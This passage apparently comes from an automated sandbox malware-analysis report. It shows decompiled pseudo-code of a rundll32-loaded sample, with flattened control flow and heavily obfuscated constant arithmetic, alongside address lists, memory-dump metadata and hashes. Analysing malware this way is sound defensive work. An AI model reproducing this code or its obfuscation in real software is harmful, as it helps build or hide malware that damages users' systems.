						if(_t301 == 0x661bd7c) {
							E0079957D(_v8, _v96, _v20, _v28, _v36);
						} else {
							if(_t301 == 0x8cd68b1) {
								_push(_v116);
								_push(_v124);
								_t293 = E007ADCF7(_v84, 0x791954, __eflags);
								_push(_v52);
								_push(_v48);
								__eflags = E00799462(_t293, _v80,  &_v8, E007ADCF7(_v88, 0x791814, __eflags), _v56, _v40) - _v12;
								_t301 =  ==  ? 0x4469cd4 : 0x94c729c;
								E0079A8B0(_v132, _t293, _v108);
								E0079A8B0(_v72, _t294, _v32);
								_t343 = _v4;
								L8:
								_t284 = 0x4469cd4;
								_t348 =  &(_t348[0xb]);
								goto L9;
							} else {
								if(_t301 != 0x97dfe60) {
									goto L9;
								} else {
									_t301 = 0x8cd68b1;
									continue;
								}
							}
						}
						L12:
						return _t347;
					}
					_push(_v92);
					_push(_v100);
					_t285 = E007ADCF7(_v16, 0x791854, __eflags);
					_pop(_t311);
					_t286 =  *0x7b3dfc; // 0x0
					__eflags = E0079AA4D(_v60, _t285,  *((intOrPtr*)(_t343 + 4)), _v120, _v24, _v8, _t286 + 0x40, _v128, _t311,  *_t343, _v76) - _v112;
					_t301 = 0x661bd7c;
					_t347 =  ==  ? 1 : _t347;
					E0079A8B0(_v104, _t285, _v44);
					goto L8;
					L9:
					__eflags = _t301 - 0x94c729c;
				} while (__eflags != 0);
				goto L12;
			}


















































                                                                                                                          0x007a907f
                                                                                                                          0x007a9089
                                                                                                                          0x007a908b
                                                                                                                          0x007a9092
                                                                                                                          0x007a909c
                                                                                                                          0x007a90a4
                                                                                                                          0x007a90ac
                                                                                                                          0x007a90b7
                                                                                                                          0x007a90c2
                                                                                                                          0x007a90cd
                                                                                                                          0x007a90db
                                                                                                                          0x007a90dd
                                                                                                                          0x007a90e2
                                                                                                                          0x007a90eb
                                                                                                                          0x007a90f6
                                                                                                                          0x007a90fb
                                                                                                                          0x007a9103
                                                                                                                          0x007a910b
                                                                                                                          0x007a9113
                                                                                                                          0x007a9118
                                                                                                                          0x007a9120
                                                                                                                          0x007a912d
                                                                                                                          0x007a9130
                                                                                                                          0x007a9134
                                                                                                                          0x007a913c
                                                                                                                          0x007a9144
                                                                                                                          0x007a914c
                                                                                                                          0x007a9154
                                                                                                                          0x007a915c
                                                                                                                          0x007a9164
                                                                                                                          0x007a916c
                                                                                                                          0x007a9174
                                                                                                                          0x007a917c
                                                                                                                          0x007a9189
                                                                                                                          0x007a918d
                                                                                                                          0x007a9192
                                                                                                                          0x007a919a
                                                                                                                          0x007a91a2
                                                                                                                          0x007a91b2
                                                                                                                          0x007a91b6
                                                                                                                          0x007a91be
                                                                                                                          0x007a91c6
                                                                                                                          0x007a91d2
                                                                                                                          0x007a91d5
                                                                                                                          0x007a91d9
                                                                                                                          0x007a91e1
                                                                                                                          0x007a91e9
                                                                                                                          0x007a91f1
                                                                                                                          0x007a91f9
                                                                                                                          0x007a9201
                                                                                                                          0x007a9209
                                                                                                                          0x007a920e
                                                                                                                          0x007a9216
                                                                                                                          0x007a921e
                                                                                                                          0x007a9226
                                                                                                                          0x007a922b
                                                                                                                          0x007a9233
                                                                                                                          0x007a923b
                                                                                                                          0x007a9243
                                                                                                                          0x007a9248
                                                                                                                          0x007a9250
                                                                                                                          0x007a9258
                                                                                                                          0x007a9260
                                                                                                                          0x007a9268
                                                                                                                          0x007a926d
                                                                                                                          0x007a9277
                                                                                                                          0x007a927f
                                                                                                                          0x007a9287
                                                                                                                          0x007a928f
                                                                                                                          0x007a9294
                                                                                                                          0x007a929c
                                                                                                                          0x007a92a4
                                                                                                                          0x007a92ac
                                                                                                                          0x007a92ba
                                                                                                                          0x007a92bf
                                                                                                                          0x007a92c5
                                                                                                                          0x007a92cd
                                                                                                                          0x007a92d5
                                                                                                                          0x007a92da
                                                                                                                          0x007a92e2
                                                                                                                          0x007a92ed
                                                                                                                          0x007a92f8
                                                                                                                          0x007a9303
                                                                                                                          0x007a930b
                                                                                                                          0x007a9313
                                                                                                                          0x007a9318
                                                                                                                          0x007a9320
                                                                                                                          0x007a932c
                                                                                                                          0x007a932f
                                                                                                                          0x007a9333
                                                                                                                          0x007a9338
                                                                                                                          0x007a9340
                                                                                                                          0x007a934d
                                                                                                                          0x007a9351
                                                                                                                          0x007a9356
                                                                                                                          0x007a935e
                                                                                                                          0x007a9366
                                                                                                                          0x007a936a
                                                                                                                          0x007a9372
                                                                                                                          0x007a937a
                                                                                                                          0x007a9382
                                                                                                                          0x007a938a
                                                                                                                          0x007a9392
                                                                                                                          0x007a9397
                                                                                                                          0x007a939f
                                                                                                                          0x007a93a7
                                                                                                                          0x007a93ac
                                                                                                                          0x007a93b4
                                                                                                                          0x007a93bc
                                                                                                                          0x007a93c4
                                                                                                                          0x007a93cc
                                                                                                                          0x007a93d4
                                                                                                                          0x007a93d9
                                                                                                                          0x007a93e1
                                                                                                                          0x007a93ee
                                                                                                                          0x007a93f2
                                                                                                                          0x007a93f7
                                                                                                                          0x007a93ff
                                                                                                                          0x007a9407
                                                                                                                          0x007a940f
                                                                                                                          0x007a9414
                                                                                                                          0x007a941c
                                                                                                                          0x007a9424
                                                                                                                          0x007a942c
                                                                                                                          0x007a9434
                                                                                                                          0x007a943c
                                                                                                                          0x007a944f
                                                                                                                          0x007a9456
                                                                                                                          0x007a945b
                                                                                                                          0x007a9466
                                                                                                                          0x007a946e
                                                                                                                          0x007a9473
                                                                                                                          0x007a947b
                                                                                                                          0x007a947b
                                                                                                                          0x007a9489
                                                                                                                          0x007a95e5
                                                                                                                          0x007a948f
                                                                                                                          0x007a9495
                                                                                                                          0x007a94aa
                                                                                                                          0x007a94b3
                                                                                                                          0x007a94bb
                                                                                                                          0x007a94c0
                                                                                                                          0x007a94cb
                                                                                                                          0x007a950e
                                                                                                                          0x007a9519
                                                                                                                          0x007a951c
                                                                                                                          0x007a952e
                                                                                                                          0x007a9533
                                                                                                                          0x007a95b5
                                                                                                                          0x007a95b5
                                                                                                                          0x007a95ba
                                                                                                                          0x00000000
                                                                                                                          0x007a9497
                                                                                                                          0x007a949d
                                                                                                                          0x00000000
                                                                                                                          0x007a94a3
                                                                                                                          0x007a94a3
                                                                                                                          0x00000000
                                                                                                                          0x007a94a3
                                                                                                                          0x007a949d
                                                                                                                          0x007a9495
                                                                                                                          0x007a95ef
                                                                                                                          0x007a95f9
                                                                                                                          0x007a95f9
                                                                                                                          0x007a953c
                                                                                                                          0x007a9545
                                                                                                                          0x007a9550
                                                                                                                          0x007a9556
                                                                                                                          0x007a9564
                                                                                                                          0x007a95a0
                                                                                                                          0x007a95a2
                                                                                                                          0x007a95ab
                                                                                                                          0x007a95b0
                                                                                                                          0x00000000
                                                                                                                          0x007a95bd
                                                                                                                          0x007a95bd
                                                                                                                          0x007a95bd
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 5NE$=$H/$X$]R$dklp
                                                                                                                          • API String ID: 0-668800459
                                                                                                                          • Opcode ID: 23f4abd7d33b23c8a265d0671c31733d79bafa2498ee1a55f8f3bc874658bcf2
                                                                                                                          • Instruction ID: 646ee89b88d54726ce63a722e6ca313b6cb4cfce0482d69292e3d93fc50a4893
                                                                                                                          • Opcode Fuzzy Hash: 23f4abd7d33b23c8a265d0671c31733d79bafa2498ee1a55f8f3bc874658bcf2
                                                                                                                          • Instruction Fuzzy Hash: 90D12FB11097808FD769CF25C48A50BBBF1FBC5758F508A1DF2AA86260DBB58949CF43
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007B0F33 Relevance: 7.8, Strings: 6, Instructions: 260COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E007B0F33() {
				signed int _t237;
				signed char _t246;
				signed short _t255;
				signed int _t262;
				signed char _t269;
				intOrPtr* _t292;
				signed short _t301;
				void* _t302;
				signed short _t306;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed short _t319;
				void* _t321;

				 *(_t321 + 0x20) = 0xee0abc;
				 *(_t321 + 0x20) =  *(_t321 + 0x20) | 0x247001dc;
				_t262 = 0x40ff1a8;
				 *(_t321 + 0x30) =  *(_t321 + 0x20) * 0xb;
				 *(_t321 + 0x30) =  *(_t321 + 0x30) ^ 0x96ee7e42;
				 *(_t321 + 0x14) = 0x97563a;
				 *(_t321 + 0x14) =  *(_t321 + 0x14) + 0xa3ba;
				 *(_t321 + 0x14) =  *(_t321 + 0x14) + 0x7434;
				_t309 = 0x68;
				 *(_t321 + 0x18) =  *(_t321 + 0x14) / _t309;
				 *(_t321 + 0x18) =  *(_t321 + 0x18) ^ 0x000fa3ad;
				 *(_t321 + 0x54) = 0x46dfd;
				_t310 = 0x22;
				 *(_t321 + 0x54) =  *(_t321 + 0x54) * 0x3f;
				 *(_t321 + 0x54) =  *(_t321 + 0x54) ^ 0x011c0bd3;
				 *(_t321 + 0x50) = 0x65d669;
				 *(_t321 + 0x50) =  *(_t321 + 0x50) >> 4;
				 *(_t321 + 0x50) =  *(_t321 + 0x50) ^ 0x0002663c;
				 *(_t321 + 0x1c) = 0xa5dab8;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) * 0x23;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) >> 2;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) << 0xd;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) ^ 0x67379b84;
				 *(_t321 + 0x58) = 0x508bac;
				 *(_t321 + 0x58) =  *(_t321 + 0x58) + 0x81b9;
				 *(_t321 + 0x58) =  *(_t321 + 0x58) ^ 0x005059a5;
				 *(_t321 + 0x38) = 0x6dc462;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) / _t310;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) | 0x03137037;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) ^ 0x03112268;
				 *(_t321 + 0x20) = 0x10f337;
				 *(_t321 + 0x20) =  *(_t321 + 0x20) << 0x10;
				_t311 = 0x7a;
				 *(_t321 + 0x1c) =  *(_t321 + 0x20) * 0x5e;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) >> 3;
				 *(_t321 + 0x1c) =  *(_t321 + 0x1c) ^ 0x09c781ed;
				 *(_t321 + 0x28) = 0x5a8e56;
				 *(_t321 + 0x28) =  *(_t321 + 0x28) ^ 0x165ac6ba;
				 *(_t321 + 0x28) =  *(_t321 + 0x28) / _t311;
				 *(_t321 + 0x28) =  *(_t321 + 0x28) >> 6;
				 *(_t321 + 0x28) =  *(_t321 + 0x28) ^ 0x000470dc;
				 *(_t321 + 0x40) = 0x558325;
				 *(_t321 + 0x40) =  *(_t321 + 0x40) | 0xb8e268f7;
				 *(_t321 + 0x40) =  *(_t321 + 0x40) + 0x4ee7;
				 *(_t321 + 0x40) =  *(_t321 + 0x40) ^ 0xb8f7e628;
				 *(_t321 + 0x3c) = 0x76576d;
				 *(_t321 + 0x3c) =  *(_t321 + 0x3c) << 1;
				 *(_t321 + 0x3c) =  *(_t321 + 0x3c) + 0xffff05d8;
				 *(_t321 + 0x3c) =  *(_t321 + 0x3c) ^ 0x00efc885;
				 *(_t321 + 0x38) = 0x7fcfc;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) >> 4;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) * 0x1e;
				 *(_t321 + 0x38) =  *(_t321 + 0x38) ^ 0x0005448a;
				 *(_t321 + 0x58) = 0x685aea;
				 *(_t321 + 0x58) =  *(_t321 + 0x58) | 0x7e49cfb4;
				 *(_t321 + 0x58) =  *(_t321 + 0x58) ^ 0x7e6c4597;
				 *(_t321 + 0x24) = 0x2cb25b;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) | 0x98b89101;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) + 0x99b1;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) << 5;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) ^ 0x17a3ab17;
				 *(_t321 + 0x20) = 0x5c4f5f;
				_t312 = 0x75;
				_t306 =  *(_t321 + 0x70);
				 *(_t321 + 0x24) =  *(_t321 + 0x20) * 0x3b;
				_t319 =  *(_t321 + 0x70);
				 *(_t321 + 0x24) =  *(_t321 + 0x24) / _t312;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) ^ 0x3b5669b3;
				 *(_t321 + 0x24) =  *(_t321 + 0x24) ^ 0x3b72ed3d;
				 *(_t321 + 0x48) = 0x281dd4;
				 *(_t321 + 0x48) =  *(_t321 + 0x48) >> 8;
				 *(_t321 + 0x48) =  *(_t321 + 0x48) + 0xfffffe89;
				 *(_t321 + 0x48) =  *(_t321 + 0x48) ^ 0x000ef8bb;
				 *(_t321 + 0x60) = 0x5ec984;
				 *(_t321 + 0x60) =  *(_t321 + 0x60) + 0xefe6;
				 *(_t321 + 0x60) =  *(_t321 + 0x60) ^ 0x00516114;
				 *(_t321 + 0x4c) = 0xbf15d9;
				_t313 = 0x6c;
				 *(_t321 + 0x4c) =  *(_t321 + 0x4c) / _t313;
				_t314 = 0x6b;
				 *(_t321 + 0x4c) =  *(_t321 + 0x4c) / _t314;
				 *(_t321 + 0x4c) =  *(_t321 + 0x4c) ^ 0x000706ff;
				 *(_t321 + 0x30) = 0x4468c3;
				_t315 = 0x7e;
				 *(_t321 + 0x2c) =  *(_t321 + 0x30) * 0x39;
				 *(_t321 + 0x2c) =  *(_t321 + 0x2c) / _t315;
				 *(_t321 + 0x2c) =  *(_t321 + 0x2c) * 0x49;
				 *(_t321 + 0x2c) =  *(_t321 + 0x2c) ^ 0x08d90aee;
				while(1) {
					L1:
					_t292 =  *0x7b3e08; // 0x0
					while(1) {
						L2:
						_t237 =  *(_t321 + 0x60);
						L3:
						while(_t262 != 0x160fcc4) {
							if(_t262 == 0x26954f0) {
								 *_t237 = _t319;
								_t262 = 0xfeff895;
								 *_t292 =  *_t292 + 1;
								_t237 = _t319;
								 *(_t321 + 0x60) = _t237;
								continue;
							} else {
								if(_t262 == 0x40ff1a8) {
									_t179 = _t292 + 0x20; // 0x20
									_t237 = _t179;
									_t262 = 0x5ead19b;
									 *(_t321 + 0x60) = _t237;
									continue;
								} else {
									if(_t262 == 0x58e8483) {
										_push(_t262);
										_push(_t262);
										_t302 = 0x40;
										_t319 = E00797FF2(_t302);
										__eflags = _t319;
										if(__eflags == 0) {
											goto L20;
										} else {
											_t262 = 0x160fcc4;
											goto L1;
										}
									} else {
										if(_t262 == 0x5ead19b) {
											_t255 = E007A7BA6(_t321 + 0x6c,  *(_t321 + 0x38), __eflags,  *(_t321 + 0x18), 0x7b3000);
											 *(_t321 + 0x70) = _t255;
											_t306 = _t255;
											 *((intOrPtr*)(_t321 + 0x68)) = _t255 +  *((intOrPtr*)(_t321 + 0x68));
											_t262 = 0x58e8483;
											while(1) {
												L1:
												_t292 =  *0x7b3e08; // 0x0
												goto L2;
											}
										} else {
											if(_t262 == 0xd41016e) {
												E007A8519( *(_t321 + 0x4c),  *(_t321 + 0x2c),  *((intOrPtr*)(_t321 + 0x6c)));
												L20:
												_t292 =  *0x7b3e08; // 0x0
											} else {
												if(_t262 != 0xfeff895) {
													L17:
													__eflags = _t262 - 0x20f61b3;
													if(__eflags != 0) {
														L2:
														_t237 =  *(_t321 + 0x60);
														continue;
													}
												} else {
													asm("sbb ecx, ecx");
													_t262 = (_t262 & 0xf84d8315) + 0xd41016e;
													continue;
												}
											}
										}
									}
								}
							}
							 *(_t292 + 0x14) =  *(_t292 + 0x14) & 0x00000000;
							 *((intOrPtr*)(_t292 + 4)) =  *(_t292 + 0x20);
							__eflags = 1;
							return 1;
						}
						_push( *(_t321 + 0x1c));
						_push( *(_t321 + 0x38));
						 *((char*)(_t321 + 0x1b)) =  *((intOrPtr*)(_t306 + 1));
						 *((char*)(_t321 + 0x1a)) =  *((intOrPtr*)(_t306 + 2));
						E007A1652( *(_t321 + 0x70), __eflags,  *(_t321 + 0x47) & 0x000000ff,  *(_t321 + 0x26) & 0x000000ff,  *((intOrPtr*)(_t321 + 0x68)),  *(_t321 + 0x60), E007ADCF7( *((intOrPtr*)(_t321 + 0x5c)), 0x791590, __eflags), 0x10, _t319 + 0x1c,  *(_t321 + 0x70),  *(_t306 + 3) & 0x000000ff,  *((intOrPtr*)(_t321 + 0x34)),  *(_t306 + 3) & 0x000000ff,  *(_t321 + 0x28));
						E0079A8B0( *((intOrPtr*)(_t321 + 0x80)), _t240,  *((intOrPtr*)(_t321 + 0x94)));
						_t321 = _t321 + 0x3c;
						 *(_t319 + 0x1a) = ( *(_t306 + 4) & 0x000000ff) << 0x00000008 |  *(_t306 + 5) & 0x000000ff;
						_t246 =  *((intOrPtr*)(_t306 + 6));
						_t269 =  *((intOrPtr*)(_t306 + 7));
						_t306 = _t306 + 8;
						_t262 = 0x26954f0;
						_t301 = (_t246 & 0x000000ff) << 0x00000008 | _t269 & 0x000000ff;
						__eflags = _t301;
						 *(_t319 + 0x18) = _t301;
						_t292 =  *0x7b3e08; // 0x0
						goto L17;
					}
				}
			}





















                                                                                                                          0x007b0f36
                                                                                                                          0x007b0f40
                                                                                                                          0x007b0f48
                                                                                                                          0x007b0f56
                                                                                                                          0x007b0f5a
                                                                                                                          0x007b0f62
                                                                                                                          0x007b0f6a
                                                                                                                          0x007b0f72
                                                                                                                          0x007b0f80
                                                                                                                          0x007b0f85
                                                                                                                          0x007b0f8b
                                                                                                                          0x007b0f93
                                                                                                                          0x007b0fa0
                                                                                                                          0x007b0fa3
                                                                                                                          0x007b0fa7
                                                                                                                          0x007b0faf
                                                                                                                          0x007b0fb7
                                                                                                                          0x007b0fbc
                                                                                                                          0x007b0fc4
                                                                                                                          0x007b0fd1
                                                                                                                          0x007b0fd5
                                                                                                                          0x007b0fda
                                                                                                                          0x007b0fdf
                                                                                                                          0x007b0fe7
                                                                                                                          0x007b0fef
                                                                                                                          0x007b0ff7
                                                                                                                          0x007b0fff
                                                                                                                          0x007b100f
                                                                                                                          0x007b1013
                                                                                                                          0x007b101b
                                                                                                                          0x007b1023
                                                                                                                          0x007b102b
                                                                                                                          0x007b1035
                                                                                                                          0x007b1036
                                                                                                                          0x007b103a
                                                                                                                          0x007b103f
                                                                                                                          0x007b1047
                                                                                                                          0x007b104f
                                                                                                                          0x007b105d
                                                                                                                          0x007b1061
                                                                                                                          0x007b1066
                                                                                                                          0x007b106e
                                                                                                                          0x007b1076
                                                                                                                          0x007b107e
                                                                                                                          0x007b1086
                                                                                                                          0x007b108e
                                                                                                                          0x007b1096
                                                                                                                          0x007b109a
                                                                                                                          0x007b10a2
                                                                                                                          0x007b10aa
                                                                                                                          0x007b10b2
                                                                                                                          0x007b10bc
                                                                                                                          0x007b10c0
                                                                                                                          0x007b10c8
                                                                                                                          0x007b10d0
                                                                                                                          0x007b10d8
                                                                                                                          0x007b10e0
                                                                                                                          0x007b10e8
                                                                                                                          0x007b10f0
                                                                                                                          0x007b10f8
                                                                                                                          0x007b10fd
                                                                                                                          0x007b1107
                                                                                                                          0x007b1116
                                                                                                                          0x007b1119
                                                                                                                          0x007b111d
                                                                                                                          0x007b1129
                                                                                                                          0x007b112d
                                                                                                                          0x007b1131
                                                                                                                          0x007b1139
                                                                                                                          0x007b1141
                                                                                                                          0x007b1149
                                                                                                                          0x007b114e
                                                                                                                          0x007b1156
                                                                                                                          0x007b115e
                                                                                                                          0x007b1166
                                                                                                                          0x007b116e
                                                                                                                          0x007b1176
                                                                                                                          0x007b1182
                                                                                                                          0x007b1187
                                                                                                                          0x007b1191
                                                                                                                          0x007b1196
                                                                                                                          0x007b119c
                                                                                                                          0x007b11a4
                                                                                                                          0x007b11b1
                                                                                                                          0x007b11b2
                                                                                                                          0x007b11bc
                                                                                                                          0x007b11c5
                                                                                                                          0x007b11c9
                                                                                                                          0x007b11d1
                                                                                                                          0x007b11d1
                                                                                                                          0x007b11d1
                                                                                                                          0x007b11d7
                                                                                                                          0x007b11d7
                                                                                                                          0x007b11d7
                                                                                                                          0x00000000
                                                                                                                          0x007b11db
                                                                                                                          0x007b11ed
                                                                                                                          0x007b12a8
                                                                                                                          0x007b12aa
                                                                                                                          0x007b12af
                                                                                                                          0x007b12b1
                                                                                                                          0x007b12b3
                                                                                                                          0x00000000
                                                                                                                          0x007b11f3
                                                                                                                          0x007b11f9
                                                                                                                          0x007b1297
                                                                                                                          0x007b1297
                                                                                                                          0x007b129a
                                                                                                                          0x007b129f
                                                                                                                          0x00000000
                                                                                                                          0x007b11ff
                                                                                                                          0x007b1205
                                                                                                                          0x007b1277
                                                                                                                          0x007b1278
                                                                                                                          0x007b127b
                                                                                                                          0x007b1281
                                                                                                                          0x007b1285
                                                                                                                          0x007b1287
                                                                                                                          0x00000000
                                                                                                                          0x007b128d
                                                                                                                          0x007b128d
                                                                                                                          0x00000000
                                                                                                                          0x007b128d
                                                                                                                          0x007b1207
                                                                                                                          0x007b120d
                                                                                                                          0x007b124c
                                                                                                                          0x007b1252
                                                                                                                          0x007b1256
                                                                                                                          0x007b125d
                                                                                                                          0x007b1261
                                                                                                                          0x007b11d1
                                                                                                                          0x007b11d1
                                                                                                                          0x007b11d1
                                                                                                                          0x00000000
                                                                                                                          0x007b11d1
                                                                                                                          0x007b120f
                                                                                                                          0x007b1215
                                                                                                                          0x007b138c
                                                                                                                          0x007b1392
                                                                                                                          0x007b1392
                                                                                                                          0x007b121b
                                                                                                                          0x007b1221
                                                                                                                          0x007b1373
                                                                                                                          0x007b1373
                                                                                                                          0x007b1379
                                                                                                                          0x007b11d7
                                                                                                                          0x007b11d7
                                                                                                                          0x00000000
                                                                                                                          0x007b11d7
                                                                                                                          0x007b1227
                                                                                                                          0x007b122b
                                                                                                                          0x007b1233
                                                                                                                          0x00000000
                                                                                                                          0x007b1233
                                                                                                                          0x007b1221
                                                                                                                          0x007b1215
                                                                                                                          0x007b120d
                                                                                                                          0x007b1205
                                                                                                                          0x007b11f9
                                                                                                                          0x007b139b
                                                                                                                          0x007b13a1
                                                                                                                          0x007b13a7
                                                                                                                          0x007b13ac
                                                                                                                          0x007b13ac
                                                                                                                          0x007b12c4
                                                                                                                          0x007b12ca
                                                                                                                          0x007b12d5
                                                                                                                          0x007b12dc
                                                                                                                          0x007b131e
                                                                                                                          0x007b1333
                                                                                                                          0x007b133c
                                                                                                                          0x007b134a
                                                                                                                          0x007b134e
                                                                                                                          0x007b1351
                                                                                                                          0x007b1354
                                                                                                                          0x007b1361
                                                                                                                          0x007b1366
                                                                                                                          0x007b1366
                                                                                                                          0x007b1369
                                                                                                                          0x007b136d
                                                                                                                          0x00000000
                                                                                                                          0x007b136d
                                                                                                                          0x007b11d7

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 4t$=r;$_O\$mWv$N$Zh
                                                                                                                          • API String ID: 0-2036408213
                                                                                                                          • Opcode ID: bbf8637486fe2517bea5130f27849a817960a81cb3a447b71b7c3e4cf9797567
                                                                                                                          • Instruction ID: e1c68565833a882228618c14cbb86dddf95ca4ec550764d68df0180110081538
                                                                                                                          • Opcode Fuzzy Hash: bbf8637486fe2517bea5130f27849a817960a81cb3a447b71b7c3e4cf9797567
                                                                                                                          • Instruction Fuzzy Hash: 1EC151715083819FC318CF29C49955BBFE1FBC9358F908A0EF69696260D3B8D949CF86
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 007AD389 Relevance: 7.7, Strings: 6, Instructions: 243COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 83%
                                                                                                                          			E007AD389(void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _v60;
				char _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				void* __ecx;
				char _t245;
				void* _t263;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				void* _t280;
				void* _t306;
				intOrPtr _t307;
				char _t308;
				signed int* _t311;

				_push(_a28);
				_t306 = __edx;
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(__edx);
				_t245 = E007A20B9(0);
				_v72 = _t245;
				_t311 =  &(( &_v168)[9]);
				_v84 = 0xd8cd3;
				_t307 = _t245;
				_v84 = _v84 ^ 0x2f0b54cb;
				_v84 = _v84 ^ 0x2f06dc18;
				_t280 = 0xd3d1227;
				_v116 = 0xdf2f98;
				_v116 = _v116 >> 4;
				_v116 = _v116 | 0xd629951a;
				_v116 = _v116 ^ 0xd62df7db;
				_v120 = 0x9d2532;
				_v120 = _v120 | 0x60368432;
				_v120 = _v120 << 1;
				_v120 = _v120 ^ 0xc1706bd2;
				_v104 = 0x3ed100;
				_v104 = _v104 >> 0xd;
				_v104 = _v104 << 0x10;
				_v104 = _v104 ^ 0x01fb42fe;
				_v132 = 0xac3ff1;
				_v132 = _v132 << 1;
				_v132 = _v132 ^ 0x8b709814;
				_v132 = _v132 + 0xffff5c55;
				_v132 = _v132 ^ 0x8a223f6b;
				_v164 = 0xc1955c;
				_v164 = _v164 + 0xe851;
				_v164 = _v164 >> 5;
				_t272 = 0x7c;
				_v164 = _v164 / _t272;
				_v164 = _v164 ^ 0x000d6983;
				_v76 = 0x371de3;
				_v76 = _v76 >> 1;
				_v76 = _v76 ^ 0x00157680;
				_v156 = 0xc7985;
				_v156 = _v156 + 0xffff997a;
				_v156 = _v156 + 0x5493;
				_v156 = _v156 ^ 0xa8ab967c;
				_v156 = _v156 ^ 0xa8a621f4;
				_v92 = 0xd6ada;
				_v92 = _v92 + 0xf102;
				_v92 = _v92 ^ 0x00049005;
				_v152 = 0xbb1df2;
				_t273 = 0x71;
				_v152 = _v152 * 0x37;
				_v152 = _v152 << 2;
				_v152 = _v152 + 0x7572;
				_v152 = _v152 ^ 0xa0c338c0;
				_v108 = 0xfb68a6;
				_v108 = _v108 / _t273;
				_v108 = _v108 * 0x38;
				_v108 = _v108 ^ 0x00745d8a;
				_v160 = 0x9cfb41;
				_v160 = _v160 >> 0xd;
				_v160 = _v160 + 0xffff2425;
				_v160 = _v160 | 0xc56bf860;
				_v160 = _v160 ^ 0xffffb927;
				_v100 = 0xcc3697;
				_v100 = _v100 << 9;
				_t274 = 0x3d;
				_v100 = _v100 / _t274;
				_v100 = _v100 ^ 0x027f162e;
				_v124 = 0x5e8102;
				_v124 = _v124 << 1;
				_v124 = _v124 >> 4;
				_v124 = _v124 ^ 0x000928e5;
				_v96 = 0x9a5083;
				_v96 = _v96 + 0xffff88fb;
				_v96 = _v96 | 0x7e2ee754;
				_v96 = _v96 ^ 0x7eb15945;
				_v168 = 0x417f4c;
				_v168 = _v168 + 0x30ef;
				_v168 = _v168 + 0xffff0fcf;
				_v168 = _v168 | 0x766f950c;
				_v168 = _v168 ^ 0x7667a907;
				_v148 = 0xeb5ea2;
				_v148 = _v148 >> 1;
				_v148 = _v148 | 0xdbfe62fd;
				_v148 = _v148 ^ 0xdbf81284;
				_v88 = 0xc982d2;
				_v88 = _v88 | 0xbf502ba4;
				_v88 = _v88 ^ 0xbfda3d08;
				_v80 = 0x51a7e7;
				_v80 = _v80 | 0xcf4b4eb1;
				_v80 = _v80 ^ 0xcf5d8599;
				_v140 = 0x112038;
				_v140 = _v140 >> 0xc;
				_v140 = _v140 | 0x79e3f6d0;
				_v140 = _v140 >> 0xc;
				_v140 = _v140 ^ 0x000d6368;
				_v144 = 0x3c4be1;
				_v144 = _v144 << 1;
				_t275 = 0x51;
				_v144 = _v144 / _t275;
				_t276 = 0x44;
				_v144 = _v144 / _t276;
				_v144 = _v144 ^ 0x0006a926;
				_v112 = 0xebe610;
				_t277 = 6;
				_v112 = _v112 / _t277;
				_v112 = _v112 ^ 0x8e2a0175;
				_v112 = _v112 ^ 0x8e0783c0;
				_v128 = 0x507b99;
				_v128 = _v128 ^ 0xb6dd86a4;
				_v128 = _v128 + 0xffff6e9b;
				_v128 = _v128 * 0x6f;
